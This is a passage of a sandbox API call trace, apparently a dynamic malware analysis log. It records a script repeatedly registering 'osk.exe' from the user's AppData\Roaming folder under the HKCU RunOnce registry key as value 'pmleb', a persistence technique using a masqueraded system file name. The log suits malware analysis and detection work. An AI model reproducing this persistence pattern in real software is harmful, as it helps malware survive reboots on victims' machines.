Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.284] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.285] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x70 [0080.285] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 
0x0 [0080.285] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x71 [0080.285] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.286] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x70 [0080.286] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.286] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.286] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.286] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.286] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.286] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.286] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.286] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.286] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.286] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.287] RegCloseKey (hKey=0x280) returned 0x0 [0080.287] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.287] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.287] SetTimer (hWnd=0x20280, nIDEvent=0x2070, uElapse=0xa, lpTimerFunc=0x0) returned 0x2070 [0080.287] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.299] TranslateMessage (lpMsg=0x33f7fc) 
returned 0 [0080.299] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.299] KillTimer (hWnd=0x20280, uIDEvent=0x2070) returned 1 [0080.300] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.300] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.300] IUnknown:Release (This=0x787518) returned 0x1 [0080.300] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.300] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.300] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.300] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 
[0080.300] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.301] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.301] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.301] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.301] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.301] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x71 [0080.301] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.301] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x72 [0080.301] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, 
dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.302] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x71 [0080.302] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.302] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.302] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.302] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.302] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.302] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.302] 
_mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.302] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.303] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.303] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.303] RegCloseKey (hKey=0x280) returned 0x0 [0080.303] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.303] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.303] SetTimer (hWnd=0x20280, nIDEvent=0x2071, uElapse=0xa, lpTimerFunc=0x0) returned 0x2071 [0080.303] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.314] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.314] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.315] KillTimer (hWnd=0x20280, uIDEvent=0x2071) returned 1 [0080.315] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.315] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.315] IUnknown:Release (This=0x787518) returned 0x1 [0080.315] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.315] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.315] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.316] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, 
[1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.316] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x72 [0080.316] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.316] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x73 [0080.316] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, 
wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.317] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x72 [0080.317] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.317] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.317] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.317] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.317] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.317] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.317] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.317] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.318] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.318] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.318] RegCloseKey (hKey=0x280) returned 0x0 [0080.318] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.318] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.318] SetTimer (hWnd=0x20280, nIDEvent=0x2072, uElapse=0xa, lpTimerFunc=0x0) returned 0x2072 [0080.318] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.330] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.330] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.330] KillTimer (hWnd=0x20280, uIDEvent=0x2072) returned 1 [0080.330] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.330] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, 
Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.330] IUnknown:Release (This=0x787518) returned 0x1 [0080.331] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.331] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.331] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.331] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.331] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 
